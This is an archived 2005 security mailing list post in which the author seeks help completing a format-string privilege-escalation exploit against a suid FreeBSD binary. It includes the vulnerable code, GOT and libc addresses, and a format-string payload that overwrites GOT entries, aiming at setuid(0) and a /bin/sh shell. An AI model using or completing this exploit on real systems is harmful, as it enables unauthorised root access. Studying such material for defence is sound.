Format Strings nonexec heap/stack

From: Alex (alex00882007_at_gmail.com)
Date: 01/30/05

  • Next message: Benn Goldman Rivers: "Fwd: MS05-002 xploit modification - connectback addition"
    Date: Sun, 30 Jan 2005 01:04:43 -0500
    To: vuln-dev@securityfocus.com
    
    

    Hello, this is my first post. I hope its in the list.

    I am posting to get some help in developing an exploit for such a condition.

    The environment:
    Freebsd machine, nonexec heap/stack. This is a suid binary, but is
    not calling setuid().

    main()
    {
            char * ptr ;
            ptr = getenv("TERM");
            if(ptr)
                printf(ptr);
            printf("\n");
            exit(0);
    }

    objdump -R | grep printf
    0804999c R_386_JUMP_SLOT printf
    objdump -R | grep exit
    080499b0 R_386_JUMP_SLOT exit

    (gdb) p setuid
    $1 = {<text variable, no debug info>} 0x280c1370 <setuid>
    (gdb) p system
    $2 = {<text variable, no debug info>} 0x28093a38 <system>

    Using a format string it is possible to over-write the GOT entries for
    printf() and exit().
    I have been able to do so successfully. The problem is that it is not
    enough to do just that, since it will become system("\n") or
    system(0);

    On freebsd, arguments are passed via pushing to the stack.
    What I have been trying to do is this.

    After rewriting the GOT entry for printf as that of setuid(), i want
    to push a NULL byte onto the stack to call setuid(0);
    The GOT entry for exit() has been replaced by that of system(). So
    instead of pushing 0x0, i want to push a pointer to a "/bin/sh"
    string.

    Is this possible even? Or is there a better way of doing this.

    to ovewrrite GOT:
    export TERM=` printf \
    "\x9c\x99\x04\x08\x9e\x99\x04\x08\xb0\x99\x04\x08\xb2\x99\x04\x08"`\
    %.4960u%OFFSET\$hn%.5276u%OFFSET+1\$hn%.9628u%OFFSET+2\$hn%.60881u%OFFSET+3\$hn

    where OFFSET = stackpop(?). Usually this is ~130 but it depends on how
    your environmental variables are setup.

    Im not sure what I would do next in order to change the values that
    are being pushed. Could someone help me with this?


  • Next message: Benn Goldman Rivers: "Fwd: MS05-002 xploit modification - connectback addition"

    Relevant Pages

    • Re: How to format the command output like MySQL output
      ... I am now focusing on the development of a script interpretor (some thing ... like shell) ... but the environment does not permit it). ... And, really, if you are familiar with printf(), the part you have ...
      (Debian-User)
    • Re: Forth stdin and stdout
      ... then the w32fdos.exe exit without warning. ... is responsible for removing parameters from the stack. ... For printf; ... fprintf is invoking such a problem; without debugging it, ...
      (comp.lang.forth)
    • sieve of eratosthenes
      ... int main ... exit; ... last array elements */ ... printf; ...
      (comp.parallel.mpi)
    • Re: Reading files in /var/spool/rwho/whod.*
      ... perror; exit;} ... strncpy; ... strncpy (hostname, entry.wd_hostname, 512); strcat; ... printf ("%5d:%02d", ...
      (comp.lang.python)
    • Re: regarding DMA memory to memory copy in NIOS II
      ... The memory footprint of this hosted application is ~69 kbytes by ... static void done ... printf; ... exit; ...
      (comp.arch.fpga)